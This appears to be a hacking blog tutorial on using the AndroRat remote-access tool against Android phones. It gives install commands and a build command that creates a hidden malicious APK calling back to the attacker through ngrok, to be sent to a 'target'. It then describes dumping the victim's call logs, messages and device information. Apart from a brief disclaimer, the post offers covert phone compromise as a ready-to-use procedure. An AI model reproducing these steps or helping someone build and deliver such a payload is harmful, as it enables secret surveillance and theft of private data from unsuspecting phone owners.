How to get mobile remote access with AndroRat

We made a lot of blogs on hacking android devices, don’t think that we hate android. We don’t hate it, we just want to tell you people how hackers can easily get remote access to someone’s mobile. So in this blog, you will read about a tool that can get remote access to a phone by just sending a malicious file. The advantage is that the virus file will automatically hide in the smartphone…

Disclaimer – This blog is for educational purposes only, If you do anything illegal then we are not responsible for it…

What is AndroRat?

AndroRat is an open-source tool that is used to get remote access to any smartphone and then you can perform many malicious activities on that device. The virus file is used to hide in the system automatically after opening it once…

How to get mobile remote access

All features of this tool can work below the android version ( 10.0 ). But above version 10, some features of this tool cannot work.

Installing and Performing Tool

To install, open your browser and search ( AndroRat Github ), then go on the first website which is coming from Github. You can also go on this website by clicking on this link – ( )…

Now open your terminal and go to the destination where you have to clone your tool. Then install it by typing ( git clone )…

After that, come inside your tool’s directory by typing this command ( cd AndroRat ) than for viewing files and folders inside it type ( ls )…

Now you have to install ( TWO requirements ) before using this tool…

  1. You Need python3 In Your Linux Os.
  2. You Need java Version 8 In Your Linux Os.

If you are using “Kali Linux” or “Parrot Os” then you have to install java-8 manually by typing this command ( sudo update-alternatives –config java ).

After typing this command select java version – 8 in your terminal as you can see in the image above…

Now you have to install the requirements so type ( pip3 install -r requirements.txt ) and wait for a minute…

All done, we can use AndroRat by just typing this command ( python3 –build –ngrok -i <your IP> -p 8080 -o News4Hacker.apk ). It will make your apk virus file then send it to your target…

What Features can we use ?

You can dump victim call logs, messages, device info, etc. To know all the commands just type help in your terminal and hit enter…

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– Recon

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